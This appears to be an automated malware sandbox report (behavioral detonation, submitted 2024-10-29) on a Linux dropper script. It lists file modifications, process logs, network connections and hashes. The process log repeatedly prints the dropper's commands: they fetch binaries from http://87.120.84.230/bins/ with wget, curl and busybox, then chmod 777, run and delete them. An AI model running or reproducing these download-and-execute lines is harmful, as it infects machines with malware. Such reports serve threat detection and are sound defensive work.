| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
Processes
/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh
[/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/wget
[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
memory/869-1-0xb6743000-0xb6754044-memory.dmp
memory/908-2-0xb66d2000-0xb66e3044-memory.dmp
memory/908-3-0xb669c000-0xb66ad044-memory.dmp
memory/928-4-0xb678f000-0xb67a0044-memory.dmp
memory/934-5-0xb6733000-0xb6744044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-29 01:01
Reported
2024-10-29 01:04
Platform
